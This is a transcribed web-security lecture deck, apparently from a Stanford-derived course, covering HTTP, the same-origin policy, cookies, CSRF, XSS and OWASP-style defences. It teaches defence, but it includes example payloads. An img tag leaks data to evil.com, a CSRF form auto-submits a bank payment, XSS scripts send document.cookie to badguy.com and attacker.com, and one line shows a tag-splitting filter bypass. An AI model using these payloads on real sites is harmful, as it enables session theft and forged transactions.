web security borrowed from john mitchell, stanford
TRANSCRIPT
![Page 1: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/1.jpg)
Web Security
Borrowed from John Mitchell, Stanford
![Page 2: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/2.jpg)
Web application vulnerabilities
![Page 3: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/3.jpg)
Goals of web security
Safely browse the web Users should be able to visit a variety of
web sites, without incurring harm: No stolen information (without user’s permission) Site A cannot compromise session at Site B
Support secure web applications Applications delivered over the web should
have the same security properties we require for stand-alone applications
![Page 4: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/4.jpg)
Network Attacker
Intercepts and controls network communication
Alice
System
Network adversary
![Page 5: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/5.jpg)
Web Attacker
Sets up malicious site
visited by victim; no control of network
Alice
System
Web adversary
![Page 6: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/6.jpg)
Web Threat Models
Web attacker Control attacker.com Can obtain SSL/TLS certificate for
attacker.com User visits attacker.com
Or: runs attacker’s Facebook app, etc.
Malware attacker Attacker escapes browser isolation
mechanisms and run separately under control of OS
[not in today’s class]
![Page 7: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/7.jpg)
HTTP
![Page 8: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/8.jpg)
URLs
Global identifiers of network-retrievable documents
Example: http://stanford.edu:81/class?name=cs155#homework
Special characters are encoded as hex: %0A = newline %20 or + = space, %2B = + (special exception)
Protocol
HostnamePort Path
Query
Fragment
![Page 9: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/9.jpg)
GET /index.html HTTP/1.1Accept: image/gif, image/x-bitmap, image/jpeg, */*Accept-Language: enConnection: Keep-AliveUser-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)Host: www.example.comReferer: http://www.google.com?q=dingbats
HTTP RequestMethod File HTTP version Headers
Data – none for GET
Blank line
GET : no side effect POST : possible side effect
![Page 10: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/10.jpg)
HTTP/1.0 200 OKDate: Sun, 21 Apr 1996 02:20:42 GMTServer: Microsoft-Internet-Information-Server/5.0 Connection: keep-aliveContent-Type: text/htmlLast-Modified: Thu, 18 Apr 1996 17:39:05 GMTSet-Cookie: …Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML>
HTTP ResponseHTTP version Status code Reason phrase Headers
Data
Cookies
![Page 11: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/11.jpg)
RENDERING CONTENT
![Page 12: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/12.jpg)
Rendering and events
Basic browser execution model Each browser window or frame
Loads content Renders it
Processes HTML and scripts to display page May involve images, subframes, etc.
Responds to events
Events can be User actions: OnClick, OnMouseover Rendering: OnLoad, OnBeforeUnload Timing: setTimeout(), clearTimeout()
![Page 13: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/13.jpg)
Example<html> <body> <div style="-webkit-transform: rotateY(30deg) rotateX(-30deg); width: 200px;"> I am a strange root. </div> </body> </html>
Source: http://www.html5rocks.com/en/tutorials/speed/layers/
![Page 14: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/14.jpg)
HTML Image Tags
14
Displays this nice picture Security issues?
<html> … <p> … </p> …<img src=“http://example.com/sunset.gif” height="50" width="100"> …</html>
Basic web functionality
![Page 15: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/15.jpg)
Image tag security issues
15
Communicate with other sites <img src=“http://evil.com/pass-local-
information.jpg?extra_information”>Hide resulting image <img src=“ … ” height=“1" width=“1">
Spoof other sites Add logos that fool a user
Important Point: A web page can send information to any site
Security consequences
![Page 16: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/16.jpg)
Document Object Model (DOM)
Object-oriented interface used by scripts to dynamically access and modify web pages web page in HTML is structured data DOM provides representation of this hierarchy
Examples Properties: document.alinkColor, document.URL,
document.forms[ ], document.links[ ], … Methods: document.write(document.referrer)
Includes Browser Object Model (BOM) window, document, frames[], history, location,
navigator (type and version of browser)
![Page 17: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/17.jpg)
Changing HTML using JavaScript
Some possibilities createElement(elementName) createTextNode(text) appendChild(newChild) removeChild(node)
Example: Add a new list item (Javascript code):
var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext)
<ul id="t1"><li> Item 1 </li></ul>
HTML
![Page 18: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/18.jpg)
Frame and iFrame
Window may contain frames from different sources
Frame: rigid division as part of frameset iFrame: floating inline frame
iFrame example
Why use frames? Delegate screen area to content from another source Browser provides isolation based on frames Parent may work even if frame is broken
<iframe src="hello.html" width=450 height=100> If you can see this, your browser doesn't understand IFRAME. </iframe>
![Page 19: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/19.jpg)
ISOLATION
![Page 20: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/20.jpg)
Same Origin Policy (SOP)
Each frame of a page has an origin Origin = protocol://host:port
Frame can access its own origin Network access, Read/write DOM, Storage (cookies)
Frame cannot access data associated with a different origin
A A
B
B
A
![Page 21: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/21.jpg)
JavaScript
“The world’s most misunderstood programming language”Related to Java in name only Name was part of a marketing deal “Java is to JavaScript as car is to carpet”
Language executed by the browser Scripts are embedded in Web pages Can run before HTML is loaded, before
page is viewed, while it is being viewed, or when leaving the page
Potentially malicious website gets to execute some code on user’s machine
![Page 22: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/22.jpg)
But: scripts excluded from SOP !!<script
src=https://seal.verisign.com/getseal?host_name=a.com></script>
• Script has privileges of imported page, NOT source server.• Can script other pages in this origin, load more scripts• Other forms of importing
VeriSign
![Page 23: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/23.jpg)
Inter-frame communication policy?
23
Child
Sibling
Descendant
Frame Bust
![Page 24: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/24.jpg)
Browser Policy IE 6 (default) Permissive IE 6 (option) Child IE7 (no Flash) Descendant IE7 (with Flash) Permissive Firefox 2 Window Safari 3 Permissive Opera 9 Window HTML 5 Child
Legacy Browser Behavior
![Page 25: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/25.jpg)
COOKIES: CLIENT STATE
25
![Page 26: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/26.jpg)
Cookies
Used to store state on user’s machine
BrowserServer
POST …
HTTP Header:Set-cookie: NAME=VALUE ;
domain = (who can read) ;
expires = (when expires) ;
secure = (only over SSL)
BrowserServerPOST …
Cookie: NAME = VALUE
HTTP is stateless protocol; cookies add state
If expires=NULL:this session only
![Page 27: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/27.jpg)
Cookie authenticationBrowser Web Server Auth server
POST login.cgiUsername & pwd Validate user
auth=valStore val
Set-cookie: auth=val
GET restricted.htmlCookie: auth=val restricted.html
auth=val
YES/NOIf YES, restricted.html
Check val
![Page 28: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/28.jpg)
Cookie Security Policy
Uses: User authentication Personalization User tracking: e.g. Doubleclick (3rd
party cookies)
Browser will store: At most 20 cookies/site, 3 KB / cookie
Origin is the tuple <domain, path> Can set cookies valid across a domain
suffix
![Page 29: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/29.jpg)
WEB SITE VULNERABILITIES
29
![Page 30: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/30.jpg)
Three top web site vulnerabilites
SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL
query
CSRF – Cross-site request forgery Bad web site sends browser request to good
web site, using credentials of an innocent victim
XSS – Cross-site scripting Bad web site sends innocent victim a script
that steals information from an honest web site
![Page 31: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/31.jpg)
Three top web site vulnerabilites
SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL
query
CSRF – Cross-site request forgery Bad web site sends request to good web
site, using credentials of an innocent victim who “visits” site
XSS – Cross-site scripting Bad web site sends innocent victim a script
that steals information from an honest web site
Inject malicious script into trusted context
Leverage user’s session at victim sever
In TIRGUL
![Page 32: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/32.jpg)
Cross Site Request Forgery
![Page 33: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/33.jpg)
Recall: session using cookies
ServerBrowserPOST/login.cgi
Set-cookie: authenticator
GET…Cookie: authenticator
response
![Page 34: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/34.jpg)
Basic picture
34
Attack Server
Server Victim
User Victim
establish session
send forged request
visit server (or iframe)
receive malicious
page
1
2
3
4
Q: how long do you stay logged on to Gmail?
(w/ cookie)
![Page 35: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/35.jpg)
Example: User logs in to bank.com
Session cookie remains in browser state
User visits another site containing:
<form name=F action=http://bank.com/BillPay.php>
<input name=recipient value=badguy> … <script> document.F.submit(); </script>
Browser sends user auth cookie with request Transaction will be fulfilled
Problem: cookie auth is insufficient when side
effects occur
Cross Site Request Forgery (CSRF)
![Page 36: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/36.jpg)
Form post with cookie
User credentials
Cookie: SessionID=523FA4cd2E
![Page 37: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/37.jpg)
CSRF Defenses
Secret Validation Token
Referer Validation
Custom HTTP Header
<input type=hidden value=23a3af01b>
Referer: http://www.facebook.com/home.php
X-Requested-By: XMLHttpRequest
![Page 38: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/38.jpg)
Secret Token ValidationServer sends dynamic form HTMLForm includes a hidden hard-to-guess secret Unguessability substitutes for unforgeability
When browser POSTs the filled form: Hidden token is sent back with other fields (and session cookie is sent too)
Server verifies that token is valid and matches session
![Page 39: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/39.jpg)
Secret Token Validation
![Page 40: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/40.jpg)
Referer Validation
Referring page
Cookie: SessionID=523FA4cd2E
![Page 41: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/41.jpg)
Referer Validation
![Page 42: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/42.jpg)
Referer Validation Defense
HTTP Referer header Referer: http://www.facebook.com/ Referer: http://www.attacker.com/evil.html Referer:
Lenient Referer validation Doesn't work if Referer is missing
Strict Referer validaton Secure, but Referer is sometimes absent…
?
![Page 43: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/43.jpg)
Referer Privacy Problems
Referer may leak privacy-sensitive information
http://intranet.corp.apple.com/
projects/iphone/competitors.html
Common sources of Referer stripping:
Network stripping by the organization Network stripping by local machine Stripped by browser for HTTPS -> HTTP transitions User preference in browser Buggy user agents
Site cannot afford to block these users
![Page 44: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/44.jpg)
CSRF Recommendations
Users: when accessing a sensitive site (like a
bank) – use a different browser, not just a new tab/window
Don’t open other tabs while logged in Always logout (don’t just X the tab) –
invalidates the session cookie
Site developers: Use Anti CSRF techniques Especially important on sensitive sites
![Page 45: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/45.jpg)
Cross Site Scripting (XSS)
![Page 46: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/46.jpg)
Basic scenario: reflected XSS attack
Attack Server
Victim Server
Victim client
visit web site
receive malicious link
click on linkecho user input
1
2
3
send valuable data
5
4
![Page 47: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/47.jpg)
XSS example: vulnerable site
search field on victim.com: http://victim.com/search.php ? term
= apple
Server-side implementation of search.php:
<HTML> <TITLE> Search Results </TITLE><BODY>Results for <?php echo $_GET[term] ?> :. . .</BODY> </HTML>
echo search term into response
![Page 48: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/48.jpg)
Bad input
Consider link: (properly URL encoded)
http://victim.com/search.php ? term =
<script> window.open(“http://badguy.com?cookie = ” + document.cookie ) </script>
What if user clicks on this link?1. Browser goes to
victim.com/search.php2. Victim.com returns
<HTML> Results for <script> … </script>
3. Browser executes script: Sends badguy.com cookie for victim.com
![Page 49: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/49.jpg)
<html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script></html>
Attack Server
Victim Server
Victim client
user gets bad link
user clicks on linkvictim echoes user
input
http://victim.com/search.php ? term = <script> ... </script>
www.victim.com
www.attacker.com
![Page 50: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/50.jpg)
Basic scenario: reflected XSS attack
Attack Server
Server Victim
User Victim
Collect email addr
send malicious email
click on linkecho user input
1
2
3
send valuable data
5
4
Email version
![Page 51: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/51.jpg)
Stored XSS
Attack Server
Server Victim
User Victim
Inject malicious scriptrequest content
receive malicious
script
1
2
3
steal valuable data
4
Store bad stuff
Download it
![Page 52: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/52.jpg)
Stored XSS using images
Suppose pic.jpg on web server contains HTML !
request for http://site.com/pic.jpg results in:
HTTP/1.1 200 OK … Content-Type: image/jpeg
<html> fooled ya </html>
IE will render this as HTML (despite Content-Type)
• Consider photo sharing sites that support image uploads• What if attacker uploads an “image” that is a script?
![Page 53: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/53.jpg)
Defenses at serverAttack Server
Server Victim
User Victim
visit web site
receive malicious page
click on linkecho user input
1
2
3
send valuable data
5
4
![Page 54: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/54.jpg)
How to Protect Yourself (OWASP)
Validate all headers, cookies, query strings, form fields, hidden fields against a rigorous specification of what should be allowed. Do not attempt to identify active content and remove, filter, or sanitize it. There are too many types and too many ways of encoding. Adopt a ‘positive’ security policy that specifies what is allowed. ‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete.
![Page 55: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/55.jpg)
Input data validation and filtering
Never trust client-side data Best: allow only what you expect
Remove/encode special characters Many encodings, special chars! E.g., long (non-standard) UTF-8 encodings
![Page 56: Web Security Borrowed from John Mitchell, Stanford](https://reader034.vdocuments.us/reader034/viewer/2022051114/56649e2a5503460f94b18e0f/html5/thumbnails/56.jpg)
Problems with filters
Suppose a filter removes <script Good case
<script src=“ ...” src=“...”
But then <scr<scriptipt src=“ ...” <script src=“ ...”